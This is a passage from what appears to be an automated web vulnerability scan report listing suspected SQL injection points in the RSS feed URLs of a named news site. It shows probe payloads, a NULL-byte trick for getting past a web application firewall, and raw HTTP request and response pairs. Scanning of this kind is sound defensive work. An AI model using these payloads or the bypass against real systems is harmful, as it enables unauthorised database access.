Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:22 GMT
Content-Length: 0
Connection: close


1.82. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200913.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200913.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200913.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:53 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200913.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:53 GMT
Content-Length: 0
Connection: close


1.83. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200914.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200914.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 64439849'%20or%201%3d1--%20 and 64439849'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d1--%20/200914.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d2--%20/200914.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:36 GMT
Content-Length: 0
Connection: close


1.84. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200915.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200915.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200915.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:18 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200915.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.85. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200916.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:37 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:18:37 GMT
Date: Tue, 07 Dec 2010 23:18:37 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.86. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200916.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:18:40 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:40 GMT
Content-Length: 0
Connection: close


1.87. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200917.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200917.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 43065906'%20or%201%3d1--%20 and 43065906'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi43065906'%20or%201%3d1--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:54 GMT
Date: Tue, 07 Dec 2010 23:21:54 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi43065906'%20or%201%3d2--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.88. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200918.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200918.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:10 GMT
Date: Tue, 07 Dec 2010 23:22:10 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.89. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200922.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16674106'%20or%201%3d1--%20 and 16674106'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi16674106'%20or%201%3d1--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi16674106'%20or%201%3d2--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:21 GMT
Date: Tue, 07 Dec 2010 23:21:21 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.90. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200922.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14517237'%20or%201%3d1--%20 and 14517237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss14517237'%20or%201%3d1--%20/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Location: http://origin.feeds.mercurynews.com/defaultError.jhtml
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

Request 2

GET /mngi/rss14517237'%20or%201%3d2--%20/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.91. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200923.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200923.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200923.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
